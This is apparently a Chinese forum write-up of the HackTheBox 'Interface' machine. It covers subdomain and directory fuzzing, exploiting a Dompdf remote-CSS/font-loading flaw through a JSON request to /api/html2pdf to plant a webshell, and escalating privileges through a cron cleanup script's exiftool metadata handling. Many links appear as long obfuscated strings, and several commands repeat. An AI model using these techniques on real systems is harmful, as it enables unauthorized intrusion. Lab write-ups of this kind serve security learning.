-
-
[原创]HTB Interface(MEDIUM)
-
发表于: 2023-2-26 19:07
-
扫端口还是只开了22和80
可以看到有个子域名
直接访问会显示File not found
扫一下目录
有vendor和api两个文件夹
再扫一下
扫出了html2pdf composer dompdf信息,可以在GitHub上找到该工具
9dfK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6V1L8$3#2H3k6r3k6Q4x3V1k6V1L8$3#2H3k6r3j5`.
Dompdf is an HTML to PDF converter,这是个将html转pdf的工具
搜索过后可以找到相关的漏洞2c0K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6H3L8%4y4A6N6r3W2$3k6g2)9J5k6s2y4W2j5%4g2J5K9i4c8&6i4K6u0r3k6r3!0E0M7r3c8X3i4K6u0V1M7X3y4W2
$dompdf->loadHtml($html);
$dompdf->setPaper('A4', 'landscape');
$dompdf->render();
在这个漏洞中我们可以通过json发送数据来加载css并加载 payload
利用该exp拿webshell
修改exploit.css文件内容,将localhost改为本机ip
再修改php里的
抓包/api/html2pdf post css文件
php加载phpurl的名称 explorefontnormal和md5
payload的文件路径是在0feK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8J5k6q4)9J5k6h3#2Q4x3X3g2J5k6h3&6V1k6i4u0A6L8X3N6Q4x3X3c8S2M7r3W2Q4x3X3g2A6L8Y4c8W2M7X3k6S2j5$3g2Q4x3X3g2Z5N6r3u0Q4x3V1k6$3k6h3&6V1L8%4u0Q4x3V1k6V1L8$3#2H3k6r3k6Q4x3V1k6V1L8$3#2H3k6r3k6Q4x3V1k6D9K9h3u0Q4x3V1k6X3L8$3&6@1M7#2)9J5c8X3g2^5M7r3I4G2K9i4c8X3L8$3&6@1i4K6g2X3L8X3!0J5L8h3q4D9i4K6g2X3P5s2S2^5i4K6u0W2M7r3S2H3
拿到user flag
在/tmp目录下运行pspy
/bin/bash /usr/local/sbin/cleancache.sh
看一下cleancache.sh
脚本交换替代tmp里的文件并验证,然后使用exiftool工具从所有文件中提取meta_producer,如果与dompdf的内容不同则删除文件
可以利用meta_producer字段
curl 10.10.11.200 -I
curl 10.10.11.200 -I
echo 10.10.11.200 prd.m.rendering-api.interface.htb | sudo tee -a /etc/hosts
echo 10.10.11.200 prd.m.rendering-api.interface.htb | sudo tee -a /etc/hosts
fuf -w wordlist/SecLists-master/Discovery/Web-Content/common.txt -u http://prd.m.rendering-api.interface.htb/FUZZ -mc all -fs 0
fuf -w wordlist/SecLists-master/Discovery/Web-Content/common.txt -u http://prd.m.rendering-api.interface.htb/FUZZ -mc all -fs 0
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/big.txt -u http://prd.m.rendering-api.interface.htb/vendor/FUZZ -mc all -fs 0 -X POST
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/big.txt -u http://prd.m.rendering-api.interface.htb/vendor/FUZZ -mc all -fs 0 -X POST
{ "html": "<link rel=stylesheet href='edcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3e0m8Q4x3X3g2Q4x3V1q4Q4x3V1q4Q4x3X3g2Q4x3V1q4Q4x3V1q4Q4x3V1k6W2P5s2m8D9L8$3W2@1i4K6u0W2j5%4y4K6i4K6t1%4i4K6t1$3k6%4c8Q4x3@1t1`."
}{ "html": "<link rel=stylesheet href='edcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3e0m8Q4x3X3g2Q4x3V1q4Q4x3V1q4Q4x3X3g2Q4x3V1q4Q4x3V1q4Q4x3V1k6W2P5s2m8D9L8$3W2@1i4K6u0W2j5%4y4K6i4K6t1%4i4K6t1$3k6%4c8Q4x3@1t1`."
}echo -n 'feaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3e0m8Q4x3X3f1I4y4W2)9J5k6e0p5H3i4K6u0r3k6i4S2H3L8r3!0A6N6q4)9#2k6X3k6G2L8Y4c8Q4x3X3g2H3K9s2m8Q4x3U0M7`. | md5sum
echo -n 'feaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3e0m8Q4x3X3f1I4y4W2)9J5k6e0p5H3i4K6u0r3k6i4S2H3L8r3!0A6N6q4)9#2k6X3k6G2L8Y4c8Q4x3X3g2H3K9s2m8Q4x3U0M7`. | md5sum
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
